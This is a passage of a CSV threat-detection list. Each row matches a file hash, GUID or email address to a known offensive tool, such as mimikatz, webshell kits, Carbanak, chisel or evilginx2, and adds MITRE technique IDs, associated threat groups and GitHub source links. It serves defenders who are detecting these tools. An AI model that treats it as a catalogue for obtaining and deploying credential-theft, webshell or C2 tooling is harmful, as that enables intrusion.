"*5475aa1a750cc743c15ce710fb14490b8a59a278c63b0e049954900eedd9df71*",".{0,1000}5475aa1a750cc743c15ce710fb14490b8a59a278c63b0e049954900eedd9df71.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26803" "*5475aa1a750cc743c15ce710fb14490b8a59a278c63b0e049954900eedd9df71*",".{0,1000}5475aa1a750cc743c15ce710fb14490b8a59a278c63b0e049954900eedd9df71.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26804" "*5475aec3b9837b514367c89d8362a9d524bfa02e75b85b401025588839a40bcb*",".{0,1000}5475aec3b9837b514367c89d8362a9d524bfa02e75b85b401025588839a40bcb.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","26805" "*5477fc3d91c7db260acb251e6841c513b42cc0ebc9e0b794e819acbc65fa01b7*",".{0,1000}5477fc3d91c7db260acb251e6841c513b42cc0ebc9e0b794e819acbc65fa01b7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26806" "*54783@thesecure.biz*",".{0,1000}54783\@thesecure\.biz.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","26807" "*547b97d9bb9bfc6250599e19357911ab5ae3dde3ca5f0d49bea0e66e46799dfc*",".{0,1000}547b97d9bb9bfc6250599e19357911ab5ae3dde3ca5f0d49bea0e66e46799dfc.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","26808" "*54819445d5ceb3c582f48b574190d1b357dad08a1708595fafe3db30323c890c*",".{0,1000}54819445d5ceb3c582f48b574190d1b357dad08a1708595fafe3db30323c890c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26809" "*5494EDD3-132D-4238-AC25-FA384D78D4E3*",".{0,1000}5494EDD3\-132D\-4238\-AC25\-FA384D78D4E3.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#GUIDproject","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","26811" "*5499BC48B9E9289A19E8215F3EE3A7003DC2057D13970BFFFC42231A93E690A9*",".{0,1000}5499BC48B9E9289A19E8215F3EE3A7003DC2057D13970BFFFC42231A93E690A9.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26812" "*549d16929c8125b4b04694fe39b663c8c4953d2905d188dca2e456cc595d5ce7*",".{0,1000}549d16929c8125b4b04694fe39b663c8c4953d2905d188dca2e456cc595d5ce7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26813" "*549f93a48257b5d2003ff8faa655e0f8509f53d052eac0d952b06508caa05ef9*",".{0,1000}549f93a48257b5d2003ff8faa655e0f8509f53d052eac0d952b06508caa05ef9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26814" "*54a2a04e9a0ac34095592b4475306313c5a8026c862e442d073d63bf192893f2*",".{0,1000}54a2a04e9a0ac34095592b4475306313c5a8026c862e442d073d63bf192893f2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26815" "*54a43829632b2b9984076cb2e24c2d4cbd5e50c410eb4320591e3fc347dec662*",".{0,1000}54a43829632b2b9984076cb2e24c2d4cbd5e50c410eb4320591e3fc347dec662.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","26816" "*54b105567f0d98e09c13109f6fc147c79109d413ec542a02a7f20a73a28b1840*",".{0,1000}54b105567f0d98e09c13109f6fc147c79109d413ec542a02a7f20a73a28b1840.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26817" "*54b2757e66ac5e8173d2af618fed10afc4c3b28d02c6324847c24d8bb17c8a45*",".{0,1000}54b2757e66ac5e8173d2af618fed10afc4c3b28d02c6324847c24d8bb17c8a45.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","26818" "*54b65d41295622a4039388c986b9df46b81960d797db9b436179c6b3d1a6b82f*",".{0,1000}54b65d41295622a4039388c986b9df46b81960d797db9b436179c6b3d1a6b82f.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash 
#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","26820" "*54b66544d277b262ca2fe38f66c21a3eda9e114e44b809b7e45c7c80c502f5dc*",".{0,1000}54b66544d277b262ca2fe38f66c21a3eda9e114e44b809b7e45c7c80c502f5dc.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26821" "*54be339f0e1263b36efc2eae53780ea14e098f94fb2fbe0f6df4f7b2dafb8ce9*",".{0,1000}54be339f0e1263b36efc2eae53780ea14e098f94fb2fbe0f6df4f7b2dafb8ce9.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","26824" "*54bf6a4dd21e76db385e1a4dd952e74d28711a8fefdf802c4da52e4740a93116*",".{0,1000}54bf6a4dd21e76db385e1a4dd952e74d28711a8fefdf802c4da52e4740a93116.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","26825" 
"*54c10f32ffcf38d05a43d06bebe74838cfbad7cd45da199cc5b02e6fc45df57d*",".{0,1000}54c10f32ffcf38d05a43d06bebe74838cfbad7cd45da199cc5b02e6fc45df57d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26826" "*54c3dcecfeb6224d49ae655207cfe684f95480f16215e32a122e473ac275d0db*",".{0,1000}54c3dcecfeb6224d49ae655207cfe684f95480f16215e32a122e473ac275d0db.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","26827" "*54c4466dfe0ebd3de29706791a4cf961dea7b2ca7ca8c4ee3fc80fd4206114d3*",".{0,1000}54c4466dfe0ebd3de29706791a4cf961dea7b2ca7ca8c4ee3fc80fd4206114d3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26828" "*54c80fa33cb5988d840999e6c901fbba96f857921865c9ed21d0c8b666d926e2*",".{0,1000}54c80fa33cb5988d840999e6c901fbba96f857921865c9ed21d0c8b666d926e2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26829" 
"*54cbfafed88c0b70ede4fe88d02a9de61aee9eb2017c54e7ec0b1c97d755db35*",".{0,1000}54cbfafed88c0b70ede4fe88d02a9de61aee9eb2017c54e7ec0b1c97d755db35.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","#filehash","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","26830" "*54d3497f0b4197a649280a6f464d71154d7ecbcc663ab00a3805e820900a7955*",".{0,1000}54d3497f0b4197a649280a6f464d71154d7ecbcc663ab00a3805e820900a7955.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#filehash","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","26832" "*54d57aae2d1b212526e8b3adc769f0985d1916974af1f0b37b793d3e02c3482d*",".{0,1000}54d57aae2d1b212526e8b3adc769f0985d1916974af1f0b37b793d3e02c3482d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26833" "*54db0c7311eba1f9c32da2b1d0b9401117493a9b8bd58814e1cdb62239151204*",".{0,1000}54db0c7311eba1f9c32da2b1d0b9401117493a9b8bd58814e1cdb62239151204.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26835" "*54ddbf803299d65815109ddd5caafbb62aca474e2fc8ca33f2bc0e8925e45337*",".{0,1000}54ddbf803299d65815109ddd5caafbb62aca474e2fc8ca33f2bc0e8925e45337.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26836" "*54e500e6a857e4af31cd8e2b26b990e190e497ac0c93e654ea18dd8f3d9fbf12*",".{0,1000}54e500e6a857e4af31cd8e2b26b990e190e497ac0c93e654ea18dd8f3d9fbf12.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26838" "*54e82ce2900876594c573f74437a23034f70f959e428bb2cf046afe73f6abc56*",".{0,1000}54e82ce2900876594c573f74437a23034f70f959e428bb2cf046afe73f6abc56.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26839" "*54f6d83348b56e49afe082346be15cefa73e4baee6bf3ca909005677117b4262*",".{0,1000}54f6d83348b56e49afe082346be15cefa73e4baee6bf3ca909005677117b4262.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26843" "*54fa00769c5dfc41a26767786517a7b99a7551b16b5589cf3d5287ae1def8534*",".{0,1000}54fa00769c5dfc41a26767786517a7b99a7551b16b5589cf3d5287ae1def8534.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","26844" "*54fe99f13b593d3acfc583e17d0bfd2e315d0ee20e737610bede18eb173ae864*",".{0,1000}54fe99f13b593d3acfc583e17d0bfd2e315d0ee20e737610bede18eb173ae864.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#filehash","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","26845" "*55004532300a4eac4abf5f02f8c20e6c0071ffe1ce065da805f7f45f3e154a72*",".{0,1000}55004532300a4eac4abf5f02f8c20e6c0071ffe1ce065da805f7f45f3e154a72.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26846" 
"*550168d7c4f722b95288f8402f9ac3422dbbae250a3f36e3a10a985ac7f1c84a*",".{0,1000}550168d7c4f722b95288f8402f9ac3422dbbae250a3f36e3a10a985ac7f1c84a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26847" "*55049f7690abbbb5c8dc844e54b63269d111c0cd21e98854c666a27788dc5de6*",".{0,1000}55049f7690abbbb5c8dc844e54b63269d111c0cd21e98854c666a27788dc5de6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","26848" "*5506149199922b7560a4f6d669fb7f7b61f77668c5f8cb5a81128d0bdc1a2b2f*",".{0,1000}5506149199922b7560a4f6d669fb7f7b61f77668c5f8cb5a81128d0bdc1a2b2f.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26849" "*55079c4485a5c2df00c8e1c2f068cac31ffe13f95f0f7a822921c582f1dbeda5*",".{0,1000}55079c4485a5c2df00c8e1c2f068cac31ffe13f95f0f7a822921c582f1dbeda5.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","26850" 
"*55096accdcb71eb43edd3001d4f6ec9c40ea88d448ba9d845782ff8e70df2fb3*",".{0,1000}55096accdcb71eb43edd3001d4f6ec9c40ea88d448ba9d845782ff8e70df2fb3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26851" "*5511d77f4fec100fd2f4c0993ff991a2516a473033a18216ea54f0502785b199*",".{0,1000}5511d77f4fec100fd2f4c0993ff991a2516a473033a18216ea54f0502785b199.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26853" "*55155cb2d44c4f860926098d53a96904a1ac89e04130d8db431a2170b389696b*",".{0,1000}55155cb2d44c4f860926098d53a96904a1ac89e04130d8db431a2170b389696b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26854" 
"*55199d5089be9072f5e556c5bb2fc11a3644fec2e652883e2b4da20e851552df*",".{0,1000}55199d5089be9072f5e556c5bb2fc11a3644fec2e652883e2b4da20e851552df.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26855" "*5521ddf91976c978d2cf175fc1637c1d201ae868e3df70e7d7a5f82db9bc2829*",".{0,1000}5521ddf91976c978d2cf175fc1637c1d201ae868e3df70e7d7a5f82db9bc2829.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26857" "*5523069e10c357b8a5737e287ae18fc0d39c6870a724f40e4a49ef9a948c74e0*",".{0,1000}5523069e10c357b8a5737e287ae18fc0d39c6870a724f40e4a49ef9a948c74e0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26858" 
